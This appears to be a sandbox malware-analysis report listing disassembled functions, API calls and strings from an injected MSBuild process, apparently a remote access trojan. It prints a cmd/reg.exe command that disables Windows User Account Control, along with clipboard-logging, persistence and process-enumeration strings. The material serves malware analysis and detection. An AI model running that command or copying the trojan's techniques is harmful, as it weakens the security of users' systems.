                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 221034970-0
                                                                                                                        • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                        • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                                        • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                        • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                                        Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$InfoQueryValue
                                                                                                                        • String ID: [regsplt]$DG
                                                                                                                        • API String ID: 3554306468-1089238109
                                                                                                                        • Opcode ID: 6f7bd9bebdea3cfaa5ac79ccd65013da005c6902dca7ebe2f9e4052a80e7bc07
                                                                                                                        • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                                        • Opcode Fuzzy Hash: 6f7bd9bebdea3cfaa5ac79ccd65013da005c6902dca7ebe2f9e4052a80e7bc07
                                                                                                                        • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                        Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                                        • API String ID: 2974294136-753205382
                                                                                                                        • Opcode ID: bca9ad32993b86923eeb38013af920eef3518a691af4397d372f46d406baa9cc
                                                                                                                        • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                                        • Opcode Fuzzy Hash: bca9ad32993b86923eeb38013af920eef3518a691af4397d372f46d406baa9cc
                                                                                                                        • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                                        Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                        • String ID: `AG
                                                                                                                        • API String ID: 1958988193-3058481221
                                                                                                                        • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                        • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                        • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                                        • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                        Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                        • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                        • String ID: 0$MsgWindowClass
                                                                                                                        • API String ID: 2877667751-2410386613
                                                                                                                        • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                        • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                                        • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                                        • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                                        Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                        Strings
                                                                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                        • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                        • API String ID: 2922976086-4183131282
                                                                                                                        • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                        • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                                        • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                        • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                                        Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                        • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                                        • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                        • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                                        Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                        • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValue
                                                                                                                        • String ID: pth_unenc$BG
                                                                                                                        • API String ID: 1818849710-2233081382
                                                                                                                        • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                        • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                        • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                        • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                        Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00404AF9
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404B04
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404B0D
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                        • String ID: KeepAlive | Disabled
                                                                                                                        • API String ID: 2993684571-305739064
                                                                                                                        • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                        • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                                        • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                                        • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                                        Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                                        Strings
                                                                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                        • API String ID: 3024135584-2418719853
                                                                                                                        • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                        • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                        • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                                        • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                        Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetCursorInfo$User32.dll$`#v
                                                                                                                        • API String ID: 1646373207-1032071883
                                                                                                                        • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                        • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                                        • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                        • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                                        Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                                        • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                                        • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                                        • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                                        Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                        • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3525466593-0
                                                                                                                        • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                        • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                        • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                        • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                                        Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                          • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4269425633-0
                                                                                                                        • Opcode ID: 4b32c1e13a76f375d75c19b22900fb334df26ded524714bba44b8a96b577ad3c
                                                                                                                        • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                                        • Opcode Fuzzy Hash: 4b32c1e13a76f375d75c19b22900fb334df26ded524714bba44b8a96b577ad3c
                                                                                                                        • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                                        Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                        • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                                        • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                        • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                                        Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                                        • __freea.LIBCMT ref: 0044FFC4
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 313313983-0
                                                                                                                        • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                                        • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                                        • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                                        • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                                        Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                                        • _free.LIBCMT ref: 0044E1A0
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 336800556-0
                                                                                                                        • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                                        • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                                        • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                                        • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                                        Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                                        • _free.LIBCMT ref: 00446F7D
                                                                                                                        • _free.LIBCMT ref: 00446FA4
                                                                                                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3170660625-0
